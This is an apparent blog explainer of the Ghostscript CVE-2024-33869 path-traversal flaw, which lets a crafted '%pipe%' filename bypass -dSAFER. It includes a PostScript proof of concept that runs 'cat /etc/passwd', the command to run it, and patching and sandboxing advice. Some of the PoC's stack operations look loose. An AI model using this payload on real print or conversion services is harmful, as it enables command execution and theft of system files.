CVE-2024-33869 - Ghostscript Pre-10.03.1 Path Traversal & Command Execution Exploit Explained
Summary:
CVE-2024-33869 is a security vulnerability found in versions of Ghostscript before 10.03.1. Attackers can use specially crafted PostScript files to bypass security restrictions, leading to path traversal and even arbitrary command execution. This is possible due to how base/gpmisc.c reduces file paths, and how Ghostscript treats certain filename patterns like %pipe%. In this article, we break down exactly how the exploit works, show sample code, and explain what you can do about it.
What is Ghostscript?
Ghostscript is a popular software suite for processing PostScript (PS) and PDF files. Many Linux distributions ship it by default; it's used for everything from viewing PS files to converting PDFs.
Affected Versions: All Ghostscript versions before 10.03.1.
- Component: Path reduction logic in base/gpmisc.c.
- Impact: An attacker can execute shell commands by tricking Ghostscript into interpreting a malicious PostScript file.
A typical restriction in Ghostscript is blocking the %pipe% pseudo-device unless explicitly allowed, because it allows command execution. But the path resolution in Ghostscript can be fooled using directory traversal tricks (../) and crafted filenames like aa/../%pipe%command#.
Why is This Dangerous?
If Ghostscript processes files from untrusted users (like PDFs/PS files uploaded to a web service), an attacker can run arbitrary commands as the Ghostscript user. This can lead to full system compromise.
The Exploit: How It Works
Ghostscript allows file output and command execution (“pipes”) through magic filenames like %pipe%ls# (which runs the ls command).
Normally, Ghostscript blocks %pipe% use unless -dSAFER is off or the admin allows it. But the path reduction logic in base/gpmisc.c doesn’t properly prevent traversals like aa/../%pipe%command#. Ghostscript reduces the path and executes it as %pipe%command#—bypassing the security checks.
Sample Proof of Concept (PoC)
Here's a minimal PostScript file (exploit.ps) that demonstrates the issue, causing Ghostscript to print the contents of /etc/passwd:
%!
% This writes the output of 'cat /etc/passwd' to a file called output.txt
(currentdirectory) dup
(aa/../%pipe%cat /etc/passwd#) (r) file
512 string readline pop
(output.txt) (w) file dup 3 1 roll writestring closefile closefile
quit
How to Run
gs -dSAFER exploit.ps
*If your Ghostscript is vulnerable, check output.txt—it'll contain the contents of /etc/passwd.*
Breaking it down:
- aa/../%pipe%cat /etc/passwd# – By using ../, the path reduction logic treats this as %pipe%cat /etc/passwd#.
(r) file – Requests to open this “file”, which is really a command pipe.
- The command cat /etc/passwd is executed, and the result is written to output.txt.
Note:
Real-world attacks would use more covert or destructive commands, depending on the permissions Ghostscript runs under.
Original References & Further Reading
- Mitre CVE Entry
- Artifex Security Page
- Ghostscript commit fixing the bug
- Red Hat Security Advisory
Update as soon as possible to Ghostscript 10.03.1 or later.
- If you can’t update immediately, do not let untrusted users upload or process PS/PDF files with Ghostscript.
- Restrict Ghostscript execution with OS sandboxing (like AppArmor/SELinux).
How to check your version
gs --version
Final Thoughts
If you operate services (like print servers, PDF converters, or web apps) that process submitted PostScript or PDF files with Ghostscript, this vulnerability is critical. Attackers can escape the “sandbox” and execute arbitrary commands on your hardware just by submitting a malicious file.
Patch now!
And always be careful about file inputs from external or untrusted sources.
Stay safe!
For more details and the latest updates, monitor Ghostscript’s official security page.
*This article is for educational purposes. Do not use these methods against systems you do not own or have permission to test.*
Timeline
Published on: 07/03/2024 19:15:03 UTC
Last modified on: 10/31/2024 18:35:11 UTC